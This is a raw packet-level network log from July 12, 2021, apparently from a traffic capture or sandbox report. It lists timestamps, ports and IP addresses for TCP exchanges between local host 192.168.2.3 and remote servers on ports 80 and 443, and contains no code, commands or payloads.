Jul 12, 2021 10:29:47.051526070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.051553965 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.051565886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.051574945 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.051637888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.051656961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.051671982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.051681042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.051712990 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.052156925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.052179098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.052195072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.052233934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.052248001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.052280903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.052298069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.052325964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.052366018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.052397013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.052412033 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.052443027 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.052485943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.052534103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.052556038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.052583933 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.052609921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053184986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053215027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053237915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053255081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.053296089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.053328037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053369045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053386927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053421021 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.053440094 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.053452969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053471088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053512096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053518057 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.053540945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053561926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053585052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.053608894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.053646088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.054310083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054333925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054353952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054377079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054394960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054409981 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.054424047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054440022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054456949 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.054471016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054480076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.054502010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054517031 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.054528952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054544926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054574966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054584980 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.054620028 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.054915905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054934978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.054986000 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.055006981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.055030107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.055047035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.055078030 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.055109978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.055265903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.055284023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.055299997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.055320024 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.055352926 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.055373907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.055391073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.055406094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.055428982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.055449009 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.055535078 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.055910110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056001902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056036949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056056976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.056127071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056169033 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.056199074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056216002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056246042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056266069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.056291103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056313038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056334019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056355953 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.056368113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056385994 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.056401014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056957960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.056983948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.057034016 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.059942007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.059968948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.059989929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060014009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060024023 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060048103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060056925 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060077906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060098886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060118914 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060131073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060153961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060177088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060184956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060205936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060224056 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060235977 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060256958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060277939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060302019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060307026 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060327053 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060338974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060362101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060381889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060400009 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060412884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060426950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060441971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060462952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060482979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060501099 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060514927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060527086 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060545921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060568094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060590029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060605049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060619116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060631037 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060647964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060666084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060688972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060703993 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060717106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060734034 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060745001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060765982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060787916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060803890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060817003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060830116 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060844898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060866117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060884953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060902119 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060915947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060933113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.060946941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060971022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.060992002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.061007023 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.061019897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.061038017 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.061049938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.061069965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.061090946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.061104059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.061117887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.061136007 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.061146021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.061163902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.061198950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.071249008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.071274042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.071294069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.071316004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.071336985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.071365118 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.071398020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.071644068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.071943998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.071964025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.071994066 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.072005987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072022915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072046041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072051048 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.072072029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072089911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072110891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.072139978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072144985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.072164059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072190046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072208881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072228909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072240114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.072257996 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.072269917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072289944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072309971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.072609901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072722912 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.072732925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072751999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072774887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072796106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072818041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072828054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.072860956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.072881937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072916985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.072969913 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.073107004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.073158026 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.073180914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.073261023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.073285103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.073308945 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.073771000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.073813915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.073836088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.073862076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.073873997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.073889017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.073967934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074008942 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.074035883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074059963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074083090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074106932 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.074213982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074239969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074263096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074274063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.074297905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074304104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.074323893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074345112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074364901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.074379921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074419975 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.074881077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074924946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074954987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074976921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.074997902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.075010061 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.075031996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.075040102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.075061083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.075082064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.075098991 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.075130939 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.075556040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.075692892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.075711966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.075746059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.075756073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.075769901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.075778961 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.075810909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.075921059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.076170921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.076189995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.076204062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.076248884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.077275991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077305079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077322006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077332973 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.077368021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077375889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.077390909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077416897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077457905 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.077548027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077579021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077595949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077610970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077621937 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.077641010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077646017 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.077663898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.077683926 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.078274965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.078299046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.078314066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.078331947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.078349113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.078361988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.078377962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.078385115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.078402996 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.078439951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.078476906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.078494072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.078685999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.079282999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.079304934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.079319954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.079334021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.079353094 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.079366922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.079391956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.079396963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.079418898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.079433918 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.079444885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.079463959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.079480886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.079509974 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.079547882 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.186758995 CEST	443	49756	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:47.190983057 CEST	443	49756	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:47.192827940 CEST	443	49756	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:47.192853928 CEST	443	49756	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:47.192954063 CEST	49756	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.198347092 CEST	49756	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.198370934 CEST	49756	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.201087952 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.331805944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.331888914 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.424741030 CEST	443	49756	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:47.425517082 CEST	49756	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.428502083 CEST	443	49757	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:47.428591967 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.430409908 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.470974922 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.471199036 CEST	49755	80	192.168.2.3	47.254.186.176
